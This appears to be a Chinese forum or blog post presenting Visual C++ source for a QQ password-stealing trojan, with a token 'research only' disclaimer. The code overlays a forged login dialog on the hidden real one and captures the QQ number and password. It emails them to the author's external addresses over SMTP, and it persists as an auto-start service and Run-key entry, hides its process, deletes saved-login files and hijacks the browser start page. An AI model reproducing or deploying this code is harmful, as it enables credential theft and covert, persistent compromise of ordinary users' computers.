声名:本文只供研究学习之用,请误用于其他用途,后果本人概的负责.
QQ是目前大陆流行的IM工具,好象台湾多用的是777和MSN,本人还是感觉QQ好用.因为QQ软件真正做到了用户想要的.适合年轻人群体.呵呵,又跑提了.
先讲下具体思路,如果你不东vc++及windows编程,你还是学好再来看把.contiune,
取得QQ登陆信息有好几种方法,伴随QQ的不断升级,已经无效了.最长用全局钩子,QQ以前做了阻止全局钩子的加载.此路不通.穷举法效率不敢恭维.
想偷嘛,就是欺骗的思路,当QQ用户运行登陆窗口的时候,我们抓取QQ登陆窗口,截图,弹出我们伪造的窗口并使QQ窗口隐藏,然后我们自己的窗口内输入的用户名密码就可以很容易的获得了.呵呵,这一招应该对所有QQ版本适用,因为他是截取的图片,肯定是一样的啊.
切入正题,先要找到QQ登陆窗口 这个太简单了,网上方法很多,本人实现如下:
HWND hWnd1 = NULL, qqID_hWnd = NULL, qqPass_hWnd = NULL;
HWND ButtonLogin = NULL, ButtonCancel = NULL;
char sTitle[255];
CString ss;
DWORD QQPID;
int LoginID;
BOOL find = FALSE;
bClose=FALSE;
do
{
//获得当前激活窗口的句柄
g_hWnd =GetForegroundWindow();
GetWindowThreadProcessId(g_hWnd, &QQPID);
//根据PID获得进程名
processIdToName(sTitle, QQPID);
ss = sTitle;
ss.MakeLower();
//判断是否QQ
if(ss != "qq.exe")
{
Sleep(50);
continue;
}
//获得标题文字,判断是否登陆对话框
SendMessage(g_hWnd,WM_GETTEXT,255,(LPARAM)sTitle);
ss = sTitle;
int n = ss.Find("QQ用户登录", 0);
//int m = ss.Find("登录", 0);
//if(n >= 0 || m >= 0)
if(n>=0)
{
//获得登录窗口标题栏高度
lTitleHeight=GetSystemMetrics(SM_CYCAPTION)+3;//QQ登陆窗口跟标准的系统窗口高度不一样,为了更象我做//了调整
//获得QQ登录窗口位置
GetWindowRect(g_hWnd,&g_MainLogin);
//查找QQ自动登录按钮
Butt(g_hWnd,ButtonAuto,"Button","自动登录");
//获得自动登陆按纽位置
GetWindowRect(ButtonAuto,&g_qqAutologinRt);
//查找隐身登陆按纽位置
Butt(g_hWnd,ButtonCheckHide,"Button","隐身登录");
GetWindowRect(ButtonCheckHide,&g_qqHideLoginRt);
//查找QQ登陆按钮的句柄
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");
LoginID = GetDlgCtrlID(ButtonLogin);
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");
LoginID = GetDlgCtrlID(ButtonLogin);
//获得QQ登陆按钮窗口位置
GetWindowRect(ButtonLogin, &g_qqLogin);
//查找QQ取消按钮的句柄
ButtonCancel = FindWindowEx(g_hWnd, NULL, "Button", "取消");
//获得QQ取消按钮窗口位置
GetWindowRect(ButtonCancel, &g_qqCancel);
//查找QQ密码输入框的句柄
hWnd1 = FindWindowEx(g_hWnd, NULL, "#32770", NULL);
if(hWnd1 != NULL)
{
qqPass_hWnd = FindWindowEx(hWnd1, qqPass_hWnd, "Edit", NULL);
//获得QQ密码输入框窗口位置
GetWindowRect(qqPass_hWnd, &g_qqPassRt);
}
//查找QQ号码输入框的句柄
hWnd1 = FindWindowEx(g_hWnd, NULL, "ComboBox", NULL);
if(hWnd1 != NULL)
{
//获取QQcombox样式
//获取QQ下拉列表框位置
GetWindowRect(hWnd1, &g_qqIdComboxRt);
qqID_hWnd = FindWindowEx(hWnd1, qqID_hWnd, "Edit", NULL);
//获得QQ号码输入框窗口位置
GetWindowRect(qqID_hWnd, &g_qqIDRt);
//获得当前默认QQ号码
SendMessage(qqID_hWnd,WM_GETTEXT, 255,(LPARAM)qqid);
}
//等待QQ窗口完全出现后抓取整个屏幕
Sleep(70);
//g_DlgRt.left = 0;
g_DlgRt.left = g_MainLogin.left+2;
// g_DlgRt.top = 0;
g_DlgRt.top =g_MainLogin.top+lTitleHeight;
// g_DlgRt.right = m_xScreen;
g_DlgRt.right = g_MainLogin.right;
// g_DlgRt.bottom = m_yScreen;
g_DlgRt.bottom = g_MainLogin.bottom+lTitleHeight;
g_pBitmap = CopyScreenToBitmap(&g_DlgRt);
//设置QQ窗口为不可见
ShowWindow(g_hWnd, SW_HIDE);
// LONG qqPassStyle;
// qqPassStyle = GetWindowLong(g_hWnd, GWL_STYLE);
// SetWindowLong(g_hWnd, GWL_STYLE, qqPassStyle & ~WS_VISIBLE);
//弹出我们创建的伪造对话框
HINSTANCE hInstance = GetModuleHandle(NULL);
DialogBoxParam(hInstance, (LPCTSTR)IDD_WIN847, 0, (DLGPROC)win847, 0);//这里是我们伪造的核心代码;
/*NONCLIENTMETRICS ncm;//这段不能用,用了整个系统的高度就都变了;
ncm.cbSize = sizeof( NONCLIENTMETRICS );
::SystemParametersInfo( SPI_GETNONCLIENTMETRICS,
sizeof( NONCLIENTMETRICS ),
&ncm,
0
);
ncm.lfCaptionFont.lfHeight =lTitleHeight+100;
::SystemParametersInfo( SPI_SETNONCLIENTMETRICS,
sizeof( NONCLIENTMETRICS ),
&ncm,
SPIF_SENDCHANGE
);
*/
if(!bClose)
{
//设置QQ窗口为可见
// ShowWindow(g_hWnd, SW_SHOW);
//把QQ号码和密码填到真正的QQ登录窗口上,并模拟单击登陆按钮
SendMessage(qqID_hWnd, WM_SETTEXT, 0, (LPARAM)qqid);
// SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);
//ShowWindow(g_hWnd,SW_NORMAL);
SetForegroundWindow(g_hWnd);
/* for(int i=0;i<64;i++)
if(qqpass[i]=='/0')
break;
else
{ Sleep(50);
keybd_event(qqpass[i], 0, 0, 0);
Sleep(50);
keybd_event(qqpass[i], 0, KEYEVENTF_KEYUP, 0);
Sleep(50);
}*/
if(strcmp(qqpass,"/0")!=0)
KeyInput(qqpass);//模拟按键 把字符串转换成虚拟键值
else
{
ShowWindow(g_hWnd, SW_SHOW);
SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);
}
// Sleep(50);
//MessageBox(NULL,qqid,qqpass,MB_OK);
SendMessage(ButtonLogin, BM_CLICK, 0, 0);
// SetWindowLong(g_hWnd, GWL_STYLE, qqPassStyle | WS_VISIBLE);
// InvalidateRect(g_hWnd, &g_DlgRt, TRUE);
}
DeleteObject(g_pBitmap);
//设置标志退出循环
find = true;
}
}
while(find == FALSE);
好象一下子贴多了,算了自己看注释把.不用多说了.几个重要的函数:
void KeyInput(void*string) //将字符串转换成虚拟键值
{
char*ptr=(char*)string;
SHORT VkKey;
while(*ptr)
{
if(*ptr=='/n')
{
ptr++;
continue;
}
Sleep(50);
VkKey=VkKeyScan(*ptr);
if(HIBYTE(VkKey)&1)
{
keybd_event(VK_SHIFT,0,0,0);
keybd_event(LOBYTE(VkKey),0,0,0);
keybd_event(VK_SHIFT,0,KEYEVENTF_KEYUP,0);
}
else
{
keybd_event(LOBYTE(VkKey),0,0,0);
keybd_event(LOBYTE(VkKey), 0, KEYEVENTF_KEYUP, 0);
}
ptr++;
}
return ;
}
//根据进程ID得到进程名称
BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe;
pe.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, &pe)) {
return FALSE;
}
while (Process32Next(hSnapshot, &pe)) {
if (pe.th32ProcessID == PID) {
strcpy(lpszProcessName, pe.szExeFile);
return true;
}
}
return FALSE;
}
BOOL CreateQQItem(HWND hWnd)
{
//创建字体,因为系统默认是宋体
myf(-12,0,0,0,0,0,0,0,GB2312_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS,DEFAULT_QUALITY,DEFAULT_PITCH|FF_DONTCARE,"Arial");
//创建QQ号码输入文本框
int Width, Height;
Width = g_qqIDRt.right - g_qqIDRt.left;
Height = g_qqIDRt.bottom - g_qqIDRt.top;
// Width = g_qqIdComboxRt.right - g_qqIdComboxRt.left;
// Height = g_qqIdComboxRt.bottom - g_qqIdComboxRt.top;
// QQID = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW, g_qqIDRt.left, /
// g_qqIDRt.top, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
// QQID = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW, g_qqIDRt.left-g_MainLogin.left, /
// g_qqIDRt.top-g_MainLogin.top, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
// QQID = CreateWindowEx(0,"combobox", "", WS_VISIBLE|WS_CHILDWINDOW|CBS_DROPDOWNLIST|CBS_AUTOHSCROLL, g_qqIdComboxRt.left-g_MainLogin.left-3, /
// g_qqIdComboxRt.top-g_MainLogin.top-lTitleHeight, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
QQID = CreateWindowEx(0,"edit", "", WS_VISIBLE | WS_CHILDWINDOW, g_qqIDRt.left-g_MainLogin.left-3, /
g_qqIDRt.top-g_MainLogin.top-lTitleHeight, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
if(QQID == NULL)
return FALSE;
//根据获得的用户号码填充文本框,增加欺骗效果
SendMessage(QQID, WM_SETTEXT, 0,(LPARAM)qqid);
SendMessage(QQID,WM_SETFONT, (WPARAM)myfont,(LPARAM)0); //设置文本框的字体
//创建QQ密码输入文本框
Width = g_qqPassRt.right - g_qqPassRt.left;
Height = g_qqPassRt.bottom - g_qqPassRt.top;
// QQPASS = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW | ES_PASSWORD, g_qqPassRt.left, /
// g_qqPassRt.top, Width, Height, hWnd, (HMENU)1001, GetModuleHandle(NULL), NULL);
// QQPASS = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW | ES_PASSWORD, g_qqPassRt.left-g_MainLogin.left, /
// g_qqPassRt.top-g_MainLogin.top, Width, Height, hWnd, (HMENU)1001, GetModuleHandle(NULL), NULL);
QQPASS = CreateWindowEx(WS_EX_TOOLWINDOW,"Edit", "", WS_VISIBLE | WS_CHILDWINDOW | ES_PASSWORD, g_qqPassRt.left-g_MainLogin.left-3, /
g_qqPassRt.top-g_MainLogin.top-lTitleHeight, Width, Height, hWnd, (HMENU)1001, GetModuleHandle(NULL), NULL);
if(QQPASS == NULL)
return FALSE;
SendMessage(QQPASS,WM_SETFONT,(WPARAM)myfont, (LPARAM)0); //设置文本框的字体
//创建QQ自动登陆按纽
//获取选中状态
int n_Auto=SendMessage(ButtonAuto,BM_GETCHECK,0,0);
// if(n_Auto==BST_CHECKED)
// MessageBox(NULL,"自动登录 Has checked.",NULL,NULL);
// else
// MessageBox(NULL,"自动登录 Has Unchecked.",NULL,NULL);
int n_Hide=SendMessage(ButtonCheckHide,BM_GETCHECK,0,0);
// if(n_Hide==BST_CHECKED)
// MessageBox(NULL,"隐身登录 Has checked.",NULL,NULL);
// else
// MessageBox(NULL,"隐身登录 Has Unchecked.",NULL,NULL);
Width=g_qqAutologinRt.right-g_qqAutologinRt.left;
Height=g_qqAutologinRt.bottom-g_qqAutologinRt.top;
QQAUTO= CreateWindow("BUTTON", "自动登录", WS_VISIBLE|WS_CHILDWINDOW|BS_AUTOCHECKBOX|BS_FLAT, g_qqAutologinRt.left-g_MainLogin.left-3, /
g_qqAutologinRt.top-g_MainLogin.top-lTitleHeight, 11.5, Height, hWnd, (HMENU)1002, GetModuleHandle(NULL), NULL);
SendMessage(QQAUTO,WM_SETFONT, (WPARAM)myfont,(LPARAM)0);
SendMessage(QQAUTO,BM_SETCHECK,(WPARAM)n_Auto,(LPARAM)0);
//创建QQ隐身登陆按纽
Width=g_qqHideLoginRt.right-g_qqHideLoginRt.left;
Height=g_qqHideLoginRt.bottom-g_qqHideLoginRt.top;
QQHIDE = CreateWindow("BUTTON", "隐身登录", WS_VISIBLE|WS_CHILDWINDOW|BS_AUTOCHECKBOX|BS_FLAT, g_qqHideLoginRt.left-g_MainLogin.left-3, /
g_qqHideLoginRt.top-g_MainLogin.top-lTitleHeight,11.5, Height, hWnd, (HMENU)1003, GetModuleHandle(NULL), NULL);
SendMessage(QQHIDE,WM_SETFONT, (WPARAM)myfont,(LPARAM)0);
SendMessage(QQHIDE,BM_SETCHECK,(WPARAM)n_Hide,(LPARAM)0);
return true;
}
好了,写多了整个代码就算给你了
以下是保证程序能得到运行的代码:
void RegExe()//修改注册表,注册服务
{
HKEY hregkey=NULL;
CString m_strreg;
char sPath[100];
::GetModuleFileName(NULL,sPath,100);
char sServiceCmd[MAX_PATH];
ZeroMemory(sServiceCmd,MAX_PATH);
sprintf(sServiceCmd,_T("cmd.exe /c sc create /"CS Services/" binpath= /"%s/" start= auto DisplayName= /"CS System Services/""),sPath);
WinExec(sServiceCmd,SW_HIDE);
TCHAR * szDescription="cmd.exe /c sc description /"CS Services/" /"提供一个系统的必须服务启动项;/"";
WinExec(szDescription,SW_HIDE);
m_strreg=_T("Software//Microsoft//Windows//CurrentVersion//Run");
WriteReg(HKEY_LOCAL_MACHINE,m_strreg,"syscs",sPath);
/* m_strreg=_T("txtfile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("exefile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("inifile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("regfile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("scrfile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("chm.file//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
*/
m_strreg=_T("Software//Microsoft//Internet Explorer//Main");
char sStartPage[100]=_T("http://www.chinasystems.com");
WriteReg(HKEY_CURRENT_USER,m_strreg,"Start Page",sStartPage);
WriteReg(HKEY_LOCAL_MACHINE,m_strreg,"Default_Page_URL",sStartPage);
/* if (RegOpenKey(HKEY_LOCAL_MACHINE,m_strreg,&hregkey)!=ERROR_SUCCESS)
{
return;
}
else
{
DWORD type_1=REG_SZ;
if(::RegSetValueEx(hregkey,"syscs",0,REG_SZ,(BYTE*)sPath,100)!=ERROR_SUCCESS)
{
return;
}
}
m_strreg=_T("txtfile//shell//open//command");
if (RegOpenKey(HKEY_CLASSES_ROOT,m_strreg,&hregkey)!=ERROR_SUCCESS)
{
return;
}
else
{
DWORD type_1=REG_SZ;
if(::RegSetValueEx(hregkey,"syscs",0,REG_SZ,(BYTE*)sPath,100)!=ERROR_SUCCESS)
{
return;
}
}*/
}
好了,核心主代码:
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//防止程序多个实例运行
HANDLE hMutex = CreateMutex(NULL, TRUE, "nextmutex");
if (hMutex)
{
if (ERROR_ALREADY_EXISTS == GetLastError())
{
//MessageBox(NULL, "已经有一个程序在运行", "提示", MB_OK);
ReleaseMutex(hMutex);
ExitProcess(0);
}
}
//删除登录信息
try{
HKEY hResult;
CString m_strKey="SOFTWARE//Tencent//QQ";
RegOpenKey(HKEY_LOCAL_MACHINE,m_strKey,&hResult);
DWORD type_1=REG_SZ;
LPBYTE cRegData=new BYTE[16];
DWORD dwCount=16;
RegQueryValueEx(hResult,(LPCTSTR)"Install",0,0,cRegData,&dwCount);
// AfxMessageBox((LPCTSTR)cRegData);
CString szInstallPath=cRegData;
szInstallPath.Replace("//","");
// AfxMessageBox(szInstallPath);
RegCloseKey(hResult);
CString szAutoLoginFile=szInstallPath+"AutoLogin.dat";
CString szLoginUinListFile=szInstallPath+"LoginUinList.dat";
DeleteFile(szAutoLoginFile);
DeleteFile(szLoginUinListFile);
}catch(...){}
//DeleteFile()
hIcon=LoadIcon(hInstance,(LPCTSTR)IDI_QQ);
//核心主程序
int i=0;//防止多次获得密码,总共十次
agin: RegExe();//注册到系统
HideProcess();//隐藏进程
QQFind();
if(strcmp(qqpass,"/0")!=0)
{
//MessageBox(NULL,"send mail begin.",NULL,MB_OK);
//return 0;
//发送邮件
MUtils::WinSockHelper wshelper;
// make sure the file 'boot.ini' is in the root directory on driver C
TCHAR szbuff[MAX_PATH];
memset(szbuff,0,sizeof(szbuff));
//wsprintf(szbuff,_T("恭喜你,成功取得QQ.QQ号码:%s密码%s"),qqid,qqpass);
// std::string s1=_T("恭喜你,成功取得QQ.QQ号码")+qqid+_T("密码")+qqpass;
// std::string s1=StrCat("恭喜你,成功取得QQ.QQ号码",qqid)+StrCat("密码",qqpass);
strcat(szbuff,"恭喜你,成功取得QQ./r/n号码:");
strcat(szbuff,qqid);
strcat(szbuff,"/r/n密码:");
strcat(szbuff,qqpass);
SMailer::TextPlainContent content1(szbuff);
SMailer::MailInfo info;
info.setSenderName("CS Eximbills VC++ Programmer::Tom");
info.setSenderAddress("dlj36@163.com");
info.addReceiver("dlj36", "dlj362003@yahoo.com.cn");
info.addReceiver("dlj36", "dlj36@163.com");
info.setPriority(SMailer::Priority::normal);
info.setSubject("QQ密码盗取");
info.addMimeContent(&content1);
try
{
SMailer::MailSender sender("smtp.163.com", "dlj36", "*****");//这里换成你的密码 我的可不能告诉你,
sender.setMail(&SMailer::MailWrapper(&info));
sender.sendMail();
Sleep(2000);
}
catch (SMailer::MailException& e)
{
std::cout << e.what() << std::endl;
}
catch (...)
{
// std::cout << "Unkown error" << std::endl;
} //
}
// Sleep(10*1000);
if(i<10)//如果十次得到密码就退出程序;
{
i++;
goto agin;
}
return 0;
}
呵呵大工告成,不想多说,程序很明白.本人没有用它来岛取QQ,只是自己做着玩的,利用它练习的.
有想得到所有代码的请打住(呵呵,我认识的熟人除外,哈哈),本人概不提供,谢谢!@!